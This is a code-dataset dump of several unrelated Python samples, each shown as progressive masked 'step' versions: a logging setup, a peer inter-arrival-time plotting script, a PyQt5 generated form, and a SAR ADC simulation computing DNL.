characters for the first group member\n\t\t# appear for ALL the other group members\n\t\tfor char in group_responses[0]:\n\n\t\t\tchar_in_all_members = True\n\n\t\t\t# see if char exists for all other group members - if not then set\n\t\t\t# char_in_all_members to False\n\t\t\tfor item in group_responses:\n\t\t\t\t\n\t\t\t\tif char not in item:\n\n\t\t\t\t\tchar_in_all_members = False\n\n\t\t\t# if char appears for all members, add one to\n\t\t\t# count_all_members_have_response var which keeps track of the total count\n\t\t\t# for all groups\n\t\t\tif char_in_all_members == True:\n\t\t\t\t#print('char', char, 'exists for all members of this group')\n\t\t\t\tcount_all_members_have_response += 1\n\n\t\t# finished processing this group so reset the temp var group_responses\n\t\t# so it can be filled again for the next group\n\t\tgroup_responses = []\n\t\n\t\n\n\n\n\n\telse:\n\n\t\t# we are still in the same group so continue adding \n\t\t# group member responses to group_responses list\n\t\tline = line.strip()\n\t\tgroup_responses.append(line)\n\t\t\n\n\n\n# print out final counts for parts 1 and 2\nprint('TOTAL COUNT FOR ANY MEMBER HAS RESPONSE =', count_any_member_has_response)\nprint('TOTAL COUNT FOR ALL MEMBER HAVE RESPONSES =', count_all_members_have_response)\n\n\n\n\n\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import logging formatter = logging.Formatter("%(asctime)s [%(levelname)s] : %(message)s") log = logging.getLogger("othello") log.setLevel(logging.DEBUG) stream_hander = logging.StreamHandler() stream_hander.setFormatter(formatter) log.addHandler(stream_hander)
normal
{ "blob_id": "675fbdfd519d00ab10bf613e8abb7338e484fe65", "index": 57, "step-1": "<mask token>\n", "step-2": "<mask token>\nlog.setLevel(logging.DEBUG)\n<mask token>\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n", "step-3": "<mask token>\nformatter = logging.Formatter('%(asctime)s [%(levelname)s] : %(message)s')\nlog = logging.getLogger('othello')\nlog.setLevel(logging.DEBUG)\nstream_hander = logging.StreamHandler()\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n", "step-4": "import logging\nformatter = logging.Formatter('%(asctime)s [%(levelname)s] : %(message)s')\nlog = logging.getLogger('othello')\nlog.setLevel(logging.DEBUG)\nstream_hander = logging.StreamHandler()\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n", "step-5": "import logging\n\n\nformatter = logging.Formatter(\"%(asctime)s [%(levelname)s] : %(message)s\")\n\nlog = logging.getLogger(\"othello\")\nlog.setLevel(logging.DEBUG)\n\nstream_hander = logging.StreamHandler()\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import pandas as pd import numpy as np import seaborn as sns from matplotlib import pyplot as plt, ticker from analysis.report import lib_plot from analysis.report.lib_agent import known_agents from analysis.report.lib_fmt import fmt_thousands from lib_db import DBClient def main(db_client: DBClient): sns.set_theme() peer_ids = db_client.get_dangling_peer_ids() arrivals = db_client.get_inter_arrival_time(peer_ids) results_df = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s']) results_df = results_df.assign( diff_in_h=results_df.diff_in_s.apply(lambda x: x / 3600), ) fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5), sharey=True) sns.ecdfplot(ax=ax1, x="diff_in_h", data=results_df) ax1.set_xlim(0, 48) ax1.set_xticks(np.arange(0, 50, step=4)) ax1.set_xlabel("Time in Hours") ax1.set_ylabel("Number of Peers in %") ax1.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, p: "%d" % int(x * 100))) ax1.legend(loc='lower right', labels=[f"dangling ({fmt_thousands(len(results_df))})"]) ax1.title.set_text(f"CDF of Inter Arrival Times of Dangling Peers") labels = [] for agent in known_agents: peer_ids = db_client.get_peer_ids_for_agent_versions([agent]) arrivals = db_client.get_inter_arrival_time(peer_ids) data = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s']) data = data.assign( diff_in_h=data.diff_in_s.apply(lambda x: x / 3600), ) labels += [f"{agent} ({fmt_thousands(len(data))})"] sns.ecdfplot(ax=ax2, x="diff_in_h", data=data) ax2.set_xlim(0, 48) ax2.set_xticks(np.arange(0, 50, step=4)) ax2.set_xlabel("Time in Hours") ax2.set_ylabel("Number of Peers in %") ax2.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, p: "%d" % int(x * 100))) ax2.title.set_text(f"CDF of Inter Arrival Times by Agent") ax2.legend(loc='lower right', labels=labels) plt.tight_layout() lib_plot.savefig("cdf-inter-arrival-dangling") plt.show() if __name__ == '__main__': client = DBClient() main(client)
normal
{ "blob_id": "51b28650f8ae6cbda3d81695acd27744e9bfebd1", "index": 2528, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef main(db_client: DBClient):\n sns.set_theme()\n peer_ids = db_client.get_dangling_peer_ids()\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n results_df = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n results_df = results_df.assign(diff_in_h=results_df.diff_in_s.apply(lambda\n x: x / 3600))\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5), sharey=True)\n sns.ecdfplot(ax=ax1, x='diff_in_h', data=results_df)\n ax1.set_xlim(0, 48)\n ax1.set_xticks(np.arange(0, 50, step=4))\n ax1.set_xlabel('Time in Hours')\n ax1.set_ylabel('Number of Peers in %')\n ax1.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, p: \n '%d' % int(x * 100)))\n ax1.legend(loc='lower right', labels=[\n f'dangling ({fmt_thousands(len(results_df))})'])\n ax1.title.set_text(f'CDF of Inter Arrival Times of Dangling Peers')\n labels = []\n for agent in known_agents:\n peer_ids = db_client.get_peer_ids_for_agent_versions([agent])\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n data = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n data = data.assign(diff_in_h=data.diff_in_s.apply(lambda x: x / 3600))\n labels += [f'{agent} ({fmt_thousands(len(data))})']\n sns.ecdfplot(ax=ax2, x='diff_in_h', data=data)\n ax2.set_xlim(0, 48)\n ax2.set_xticks(np.arange(0, 50, step=4))\n ax2.set_xlabel('Time in Hours')\n ax2.set_ylabel('Number of Peers in %')\n ax2.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x,\n p: '%d' % int(x * 100)))\n ax2.title.set_text(f'CDF of Inter Arrival Times by Agent')\n ax2.legend(loc='lower right', labels=labels)\n plt.tight_layout()\n lib_plot.savefig('cdf-inter-arrival-dangling')\n plt.show()\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef main(db_client: DBClient):\n sns.set_theme()\n peer_ids = db_client.get_dangling_peer_ids()\n arrivals = 
db_client.get_inter_arrival_time(peer_ids)\n results_df = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n results_df = results_df.assign(diff_in_h=results_df.diff_in_s.apply(lambda\n x: x / 3600))\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5), sharey=True)\n sns.ecdfplot(ax=ax1, x='diff_in_h', data=results_df)\n ax1.set_xlim(0, 48)\n ax1.set_xticks(np.arange(0, 50, step=4))\n ax1.set_xlabel('Time in Hours')\n ax1.set_ylabel('Number of Peers in %')\n ax1.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, p: \n '%d' % int(x * 100)))\n ax1.legend(loc='lower right', labels=[\n f'dangling ({fmt_thousands(len(results_df))})'])\n ax1.title.set_text(f'CDF of Inter Arrival Times of Dangling Peers')\n labels = []\n for agent in known_agents:\n peer_ids = db_client.get_peer_ids_for_agent_versions([agent])\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n data = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n data = data.assign(diff_in_h=data.diff_in_s.apply(lambda x: x / 3600))\n labels += [f'{agent} ({fmt_thousands(len(data))})']\n sns.ecdfplot(ax=ax2, x='diff_in_h', data=data)\n ax2.set_xlim(0, 48)\n ax2.set_xticks(np.arange(0, 50, step=4))\n ax2.set_xlabel('Time in Hours')\n ax2.set_ylabel('Number of Peers in %')\n ax2.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x,\n p: '%d' % int(x * 100)))\n ax2.title.set_text(f'CDF of Inter Arrival Times by Agent')\n ax2.legend(loc='lower right', labels=labels)\n plt.tight_layout()\n lib_plot.savefig('cdf-inter-arrival-dangling')\n plt.show()\n\n\nif __name__ == '__main__':\n client = DBClient()\n main(client)\n", "step-4": "import pandas as pd\nimport numpy as np\nimport seaborn as sns\nfrom matplotlib import pyplot as plt, ticker\nfrom analysis.report import lib_plot\nfrom analysis.report.lib_agent import known_agents\nfrom analysis.report.lib_fmt import fmt_thousands\nfrom lib_db import DBClient\n\n\ndef main(db_client: DBClient):\n sns.set_theme()\n 
peer_ids = db_client.get_dangling_peer_ids()\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n results_df = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n results_df = results_df.assign(diff_in_h=results_df.diff_in_s.apply(lambda\n x: x / 3600))\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5), sharey=True)\n sns.ecdfplot(ax=ax1, x='diff_in_h', data=results_df)\n ax1.set_xlim(0, 48)\n ax1.set_xticks(np.arange(0, 50, step=4))\n ax1.set_xlabel('Time in Hours')\n ax1.set_ylabel('Number of Peers in %')\n ax1.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, p: \n '%d' % int(x * 100)))\n ax1.legend(loc='lower right', labels=[\n f'dangling ({fmt_thousands(len(results_df))})'])\n ax1.title.set_text(f'CDF of Inter Arrival Times of Dangling Peers')\n labels = []\n for agent in known_agents:\n peer_ids = db_client.get_peer_ids_for_agent_versions([agent])\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n data = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n data = data.assign(diff_in_h=data.diff_in_s.apply(lambda x: x / 3600))\n labels += [f'{agent} ({fmt_thousands(len(data))})']\n sns.ecdfplot(ax=ax2, x='diff_in_h', data=data)\n ax2.set_xlim(0, 48)\n ax2.set_xticks(np.arange(0, 50, step=4))\n ax2.set_xlabel('Time in Hours')\n ax2.set_ylabel('Number of Peers in %')\n ax2.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x,\n p: '%d' % int(x * 100)))\n ax2.title.set_text(f'CDF of Inter Arrival Times by Agent')\n ax2.legend(loc='lower right', labels=labels)\n plt.tight_layout()\n lib_plot.savefig('cdf-inter-arrival-dangling')\n plt.show()\n\n\nif __name__ == '__main__':\n client = DBClient()\n main(client)\n", "step-5": "import pandas as pd\nimport numpy as np\nimport seaborn as sns\nfrom matplotlib import pyplot as plt, ticker\n\nfrom analysis.report import lib_plot\nfrom analysis.report.lib_agent import known_agents\nfrom analysis.report.lib_fmt import fmt_thousands\nfrom lib_db import 
DBClient\n\n\ndef main(db_client: DBClient):\n sns.set_theme()\n\n peer_ids = db_client.get_dangling_peer_ids()\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n\n results_df = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n results_df = results_df.assign(\n diff_in_h=results_df.diff_in_s.apply(lambda x: x / 3600),\n )\n\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5), sharey=True)\n\n sns.ecdfplot(ax=ax1, x=\"diff_in_h\", data=results_df)\n\n ax1.set_xlim(0, 48)\n ax1.set_xticks(np.arange(0, 50, step=4))\n ax1.set_xlabel(\"Time in Hours\")\n ax1.set_ylabel(\"Number of Peers in %\")\n ax1.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, p: \"%d\" % int(x * 100)))\n ax1.legend(loc='lower right', labels=[f\"dangling ({fmt_thousands(len(results_df))})\"])\n\n ax1.title.set_text(f\"CDF of Inter Arrival Times of Dangling Peers\")\n\n labels = []\n for agent in known_agents:\n peer_ids = db_client.get_peer_ids_for_agent_versions([agent])\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n data = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n data = data.assign(\n diff_in_h=data.diff_in_s.apply(lambda x: x / 3600),\n )\n labels += [f\"{agent} ({fmt_thousands(len(data))})\"]\n sns.ecdfplot(ax=ax2, x=\"diff_in_h\", data=data)\n ax2.set_xlim(0, 48)\n ax2.set_xticks(np.arange(0, 50, step=4))\n ax2.set_xlabel(\"Time in Hours\")\n ax2.set_ylabel(\"Number of Peers in %\")\n ax2.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, p: \"%d\" % int(x * 100)))\n\n ax2.title.set_text(f\"CDF of Inter Arrival Times by Agent\")\n ax2.legend(loc='lower right', labels=labels)\n\n plt.tight_layout()\n lib_plot.savefig(\"cdf-inter-arrival-dangling\")\n plt.show()\n\n\nif __name__ == '__main__':\n client = DBClient()\n main(client)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> class Ui_FormHello(object): <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Ui_FormHello(object): def setupUi(self, FormHello): FormHello.setObjectName('FormHello') FormHello.resize(705, 477) self.LabelHello = QtWidgets.QLabel(FormHello) self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81)) font = QtGui.QFont() font.setPointSize(12) font.setBold(True) font.setWeight(75) self.LabelHello.setFont(font) self.LabelHello.setObjectName('LabelHello') self.btnClose = QtWidgets.QPushButton(FormHello) self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31)) self.btnClose.setObjectName('btnClose') self.retranslateUi(FormHello) QtCore.QMetaObject.connectSlotsByName(FormHello) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Ui_FormHello(object): def setupUi(self, FormHello): FormHello.setObjectName('FormHello') FormHello.resize(705, 477) self.LabelHello = QtWidgets.QLabel(FormHello) self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81)) font = QtGui.QFont() font.setPointSize(12) font.setBold(True) font.setWeight(75) self.LabelHello.setFont(font) self.LabelHello.setObjectName('LabelHello') self.btnClose = QtWidgets.QPushButton(FormHello) self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31)) self.btnClose.setObjectName('btnClose') self.retranslateUi(FormHello) QtCore.QMetaObject.connectSlotsByName(FormHello) def retranslateUi(self, FormHello): _translate = QtCore.QCoreApplication.translate FormHello.setWindowTitle(_translate('FormHello', 'Demo2_2')) self.LabelHello.setText(_translate('FormHello', ' Hello, by UI Designer')) self.btnClose.setText(_translate('FormHello', '关闭')) <|reserved_special_token_1|> from PyQt5 import QtCore, QtGui, QtWidgets class Ui_FormHello(object): def setupUi(self, FormHello): FormHello.setObjectName('FormHello') FormHello.resize(705, 477) self.LabelHello = QtWidgets.QLabel(FormHello) 
self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81)) font = QtGui.QFont() font.setPointSize(12) font.setBold(True) font.setWeight(75) self.LabelHello.setFont(font) self.LabelHello.setObjectName('LabelHello') self.btnClose = QtWidgets.QPushButton(FormHello) self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31)) self.btnClose.setObjectName('btnClose') self.retranslateUi(FormHello) QtCore.QMetaObject.connectSlotsByName(FormHello) def retranslateUi(self, FormHello): _translate = QtCore.QCoreApplication.translate FormHello.setWindowTitle(_translate('FormHello', 'Demo2_2')) self.LabelHello.setText(_translate('FormHello', ' Hello, by UI Designer')) self.btnClose.setText(_translate('FormHello', '关闭')) <|reserved_special_token_1|> # -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'FormHello.ui' # # Created by: PyQt5 UI code generator 5.15.4 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets class Ui_FormHello(object): def setupUi(self, FormHello): FormHello.setObjectName("FormHello") FormHello.resize(705, 477) self.LabelHello = QtWidgets.QLabel(FormHello) self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81)) font = QtGui.QFont() font.setPointSize(12) font.setBold(True) font.setWeight(75) self.LabelHello.setFont(font) self.LabelHello.setObjectName("LabelHello") self.btnClose = QtWidgets.QPushButton(FormHello) self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31)) self.btnClose.setObjectName("btnClose") self.retranslateUi(FormHello) QtCore.QMetaObject.connectSlotsByName(FormHello) def retranslateUi(self, FormHello): _translate = QtCore.QCoreApplication.translate FormHello.setWindowTitle(_translate("FormHello", "Demo2_2")) self.LabelHello.setText(_translate("FormHello", " Hello, by UI Designer")) self.btnClose.setText(_translate("FormHello", "关闭"))
flexible
{ "blob_id": "fc20a2bf09d510892a4d144fbbd2cb2012c3ad98", "index": 8579, "step-1": "<mask token>\n\n\nclass Ui_FormHello(object):\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Ui_FormHello(object):\n\n def setupUi(self, FormHello):\n FormHello.setObjectName('FormHello')\n FormHello.resize(705, 477)\n self.LabelHello = QtWidgets.QLabel(FormHello)\n self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.LabelHello.setFont(font)\n self.LabelHello.setObjectName('LabelHello')\n self.btnClose = QtWidgets.QPushButton(FormHello)\n self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31))\n self.btnClose.setObjectName('btnClose')\n self.retranslateUi(FormHello)\n QtCore.QMetaObject.connectSlotsByName(FormHello)\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Ui_FormHello(object):\n\n def setupUi(self, FormHello):\n FormHello.setObjectName('FormHello')\n FormHello.resize(705, 477)\n self.LabelHello = QtWidgets.QLabel(FormHello)\n self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.LabelHello.setFont(font)\n self.LabelHello.setObjectName('LabelHello')\n self.btnClose = QtWidgets.QPushButton(FormHello)\n self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31))\n self.btnClose.setObjectName('btnClose')\n self.retranslateUi(FormHello)\n QtCore.QMetaObject.connectSlotsByName(FormHello)\n\n def retranslateUi(self, FormHello):\n _translate = QtCore.QCoreApplication.translate\n FormHello.setWindowTitle(_translate('FormHello', 'Demo2_2'))\n self.LabelHello.setText(_translate('FormHello',\n ' Hello, by UI Designer'))\n self.btnClose.setText(_translate('FormHello', '关闭'))\n", "step-4": "from PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_FormHello(object):\n\n def setupUi(self, FormHello):\n FormHello.setObjectName('FormHello')\n 
FormHello.resize(705, 477)\n self.LabelHello = QtWidgets.QLabel(FormHello)\n self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.LabelHello.setFont(font)\n self.LabelHello.setObjectName('LabelHello')\n self.btnClose = QtWidgets.QPushButton(FormHello)\n self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31))\n self.btnClose.setObjectName('btnClose')\n self.retranslateUi(FormHello)\n QtCore.QMetaObject.connectSlotsByName(FormHello)\n\n def retranslateUi(self, FormHello):\n _translate = QtCore.QCoreApplication.translate\n FormHello.setWindowTitle(_translate('FormHello', 'Demo2_2'))\n self.LabelHello.setText(_translate('FormHello',\n ' Hello, by UI Designer'))\n self.btnClose.setText(_translate('FormHello', '关闭'))\n", "step-5": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'FormHello.ui'\n#\n# Created by: PyQt5 UI code generator 5.15.4\n#\n# WARNING: Any manual changes made to this file will be lost when pyuic5 is\n# run again. 
Do not edit this file unless you know what you are doing.\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_FormHello(object):\n def setupUi(self, FormHello):\n FormHello.setObjectName(\"FormHello\")\n FormHello.resize(705, 477)\n self.LabelHello = QtWidgets.QLabel(FormHello)\n self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.LabelHello.setFont(font)\n self.LabelHello.setObjectName(\"LabelHello\")\n self.btnClose = QtWidgets.QPushButton(FormHello)\n self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31))\n self.btnClose.setObjectName(\"btnClose\")\n\n self.retranslateUi(FormHello)\n QtCore.QMetaObject.connectSlotsByName(FormHello)\n\n def retranslateUi(self, FormHello):\n _translate = QtCore.QCoreApplication.translate\n FormHello.setWindowTitle(_translate(\"FormHello\", \"Demo2_2\"))\n self.LabelHello.setText(_translate(\"FormHello\", \" Hello, by UI Designer\"))\n self.btnClose.setText(_translate(\"FormHello\", \"关闭\"))\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
<|reserved_special_token_0|> def AtoD(vin): code = [(0) for i in range(12)] code[0] = 1 if vin > 0 else 0 for i in range(6): vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2 code[i + 1] = 1 if vin > 0 else 0 for i in range(5): vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2 code[i + 7] = 1 if vin > 0 else 0 dec_num = 0 for b in code: dec_num = dec_num * 2 + b return dec_num <|reserved_special_token_0|> def DtoA_ideal(code): v = -1.0 for i in range(12): v += 2 ** (11 - i) * code[i] / 2048 return v <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> print(CP_LSB) <|reserved_special_token_0|> print(Wi_MSB) print(Wi_LSB) def AtoD(vin): code = [(0) for i in range(12)] code[0] = 1 if vin > 0 else 0 for i in range(6): vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2 code[i + 1] = 1 if vin > 0 else 0 for i in range(5): vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2 code[i + 7] = 1 if vin > 0 else 0 dec_num = 0 for b in code: dec_num = dec_num * 2 + b return dec_num print(AtoD(0.5)) def DtoA_ideal(code): v = -1.0 for i in range(12): v += 2 ** (11 - i) * code[i] / 2048 return v print(DtoA_ideal([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])) <|reserved_special_token_0|> for i in range(2 * n): if y[i + 1] != y[i]: bin_size[y[i]] = x[i + 1] - left left = x[i + 1] <|reserved_special_token_0|> plt.plot(bin_num[1:4094], DNL[1:4094]) plt.show() <|reserved_special_token_1|> <|reserved_special_token_0|> Ci_MSB = [32, 16, 8, 4, 2, 1] Ci_LSB = [16, 8, 4, 2, 1] CB = 1 CP_B = 0 CP_LSB = (32 - 1) * (CB + CP_B - 1) + 10 print(CP_LSB) CP_MSB = 0 Csum_LSB = sum(Ci_LSB) + CP_LSB Csum_MSB = sum(Ci_MSB) + CP_MSB Cx = Csum_LSB * Csum_MSB + (CB + CP_B) * Csum_LSB + (CB + CP_B) * Csum_MSB Wi_MSB = [(Ci_MSB[i] * (CB + CP_B + Csum_LSB) / Cx) for i in range(6)] Wi_LSB = [(Ci_LSB[i] * (CB + CP_B) / Cx) for i in range(5)] print(Wi_MSB) print(Wi_LSB) def AtoD(vin): code = [(0) for i in range(12)] code[0] = 1 if vin > 0 else 0 for i in range(6): vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 
2 code[i + 1] = 1 if vin > 0 else 0 for i in range(5): vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2 code[i + 7] = 1 if vin > 0 else 0 dec_num = 0 for b in code: dec_num = dec_num * 2 + b return dec_num print(AtoD(0.5)) def DtoA_ideal(code): v = -1.0 for i in range(12): v += 2 ** (11 - i) * code[i] / 2048 return v print(DtoA_ideal([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])) n = 1000000 x = [(-1 + i / n) for i in range(2 * n + 1)] y = [AtoD(v) for v in x] bin_num = [i for i in range(4096)] bin_size = [(0) for i in range(4096)] left = x[0] for i in range(2 * n): if y[i + 1] != y[i]: bin_size[y[i]] = x[i + 1] - left left = x[i + 1] DNL = [(data * 2047 - 1) for data in bin_size] plt.plot(bin_num[1:4094], DNL[1:4094]) plt.show() <|reserved_special_token_1|> import matplotlib.pyplot as plt Ci_MSB = [32, 16, 8, 4, 2, 1] Ci_LSB = [16, 8, 4, 2, 1] CB = 1 CP_B = 0 CP_LSB = (32 - 1) * (CB + CP_B - 1) + 10 print(CP_LSB) CP_MSB = 0 Csum_LSB = sum(Ci_LSB) + CP_LSB Csum_MSB = sum(Ci_MSB) + CP_MSB Cx = Csum_LSB * Csum_MSB + (CB + CP_B) * Csum_LSB + (CB + CP_B) * Csum_MSB Wi_MSB = [(Ci_MSB[i] * (CB + CP_B + Csum_LSB) / Cx) for i in range(6)] Wi_LSB = [(Ci_LSB[i] * (CB + CP_B) / Cx) for i in range(5)] print(Wi_MSB) print(Wi_LSB) def AtoD(vin): code = [(0) for i in range(12)] code[0] = 1 if vin > 0 else 0 for i in range(6): vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2 code[i + 1] = 1 if vin > 0 else 0 for i in range(5): vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2 code[i + 7] = 1 if vin > 0 else 0 dec_num = 0 for b in code: dec_num = dec_num * 2 + b return dec_num print(AtoD(0.5)) def DtoA_ideal(code): v = -1.0 for i in range(12): v += 2 ** (11 - i) * code[i] / 2048 return v print(DtoA_ideal([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])) n = 1000000 x = [(-1 + i / n) for i in range(2 * n + 1)] y = [AtoD(v) for v in x] bin_num = [i for i in range(4096)] bin_size = [(0) for i in range(4096)] left = x[0] for i in range(2 * n): if y[i + 1] != y[i]: bin_size[y[i]] = x[i + 1] - left left = x[i + 1] 
DNL = [(data * 2047 - 1) for data in bin_size] plt.plot(bin_num[1:4094], DNL[1:4094]) plt.show() <|reserved_special_token_1|> import matplotlib.pyplot as plt Ci_MSB = [32,16,8,4,2,1] Ci_LSB = [16,8,4,2,1] CB = 1 CP_B = 0 CP_LSB = (32-1)*(CB+CP_B-1)+10 print(CP_LSB) CP_MSB = 0 Csum_LSB = sum(Ci_LSB)+CP_LSB Csum_MSB = sum(Ci_MSB)+CP_MSB Cx = Csum_LSB*Csum_MSB+(CB+CP_B)*Csum_LSB+(CB+CP_B)*Csum_MSB Wi_MSB = [Ci_MSB[i]*(CB+CP_B+Csum_LSB)/Cx for i in range (6)] Wi_LSB = [Ci_LSB[i]*(CB+CP_B)/Cx for i in range (5)] print(Wi_MSB) print(Wi_LSB) def AtoD(vin): code = [0 for i in range(12)] code[0] = 1 if vin > 0 else 0 for i in range(6): vin = vin - Wi_MSB[i] * (code[i]-0.5)*2 code[i+1] = 1 if vin > 0 else 0 for i in range(5): vin = vin - Wi_LSB[i] * (code[i+6]-0.5)*2 code[i + 7] = 1 if vin > 0 else 0 dec_num = 0 for b in code: dec_num = dec_num * 2 + b return dec_num print(AtoD(0.50)) def DtoA_ideal(code): v = -1.0 for i in range(12): v += 2**(11-i)*code[i]/2048 return v print(DtoA_ideal([1,1,1,1,1,1,1,1,1,1,1,1])) n=1000000 x = [-1+i/n for i in range(2*n+1)] y = [AtoD(v) for v in x] # print(y[int(n/6):int(n/6)+100]) bin_num = [i for i in range(4096)] bin_size = [0 for i in range(4096)] left = x[0] for i in range(2*n): if y[i+1]!=y[i]: bin_size[y[i]] = x[i+1] - left left = x[i+1] # print(bin_size) DNL = [data*2047 -1 for data in bin_size] plt.plot(bin_num[1:4094],DNL[1:4094]) # plt.xlim(1000,1005) plt.show() # y = [DtoA_ideal(AtoD(v)) for v in x] # plt.plot(x,y) # plt.xlim(-0.01,0) # plt.ylim(-0.01,0) # plt.show() # def Vout(index): # V = 0.0 # for i in range(6): # V = V + Wi_MSB[i] * int(format(index,'b').zfill(11)[i])*1 # for i in range(5): # V = V + Wi_LSB[i] * int(format(index,'b').zfill(11)[i+6])*1 # return V # print(Vout(2047)) # # x = [i for i in range(2048)] # y = [Vout(i) for i in range(2048)] # DNL = [0]+[y[i+1]-y[i]-Vout(2047)/2047 for i in range(2047)] # DNL = [data*2048 for data in DNL] # INL = [y[i] -i*Vout(2047)/2047 for i in range (2048)] # INL = [data*2048 
for data in INL] # # plt.plot(x,DNL) # plt.show()
flexible
{ "blob_id": "b5ac3695a224d531f5baa53a07d3c894d44e8c4c", "index": 395, "step-1": "<mask token>\n\n\ndef AtoD(vin):\n code = [(0) for i in range(12)]\n code[0] = 1 if vin > 0 else 0\n for i in range(6):\n vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2\n code[i + 1] = 1 if vin > 0 else 0\n for i in range(5):\n vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2\n code[i + 7] = 1 if vin > 0 else 0\n dec_num = 0\n for b in code:\n dec_num = dec_num * 2 + b\n return dec_num\n\n\n<mask token>\n\n\ndef DtoA_ideal(code):\n v = -1.0\n for i in range(12):\n v += 2 ** (11 - i) * code[i] / 2048\n return v\n\n\n<mask token>\n", "step-2": "<mask token>\nprint(CP_LSB)\n<mask token>\nprint(Wi_MSB)\nprint(Wi_LSB)\n\n\ndef AtoD(vin):\n code = [(0) for i in range(12)]\n code[0] = 1 if vin > 0 else 0\n for i in range(6):\n vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2\n code[i + 1] = 1 if vin > 0 else 0\n for i in range(5):\n vin = vin - Wi_LSB[i] * (code[i + 6] 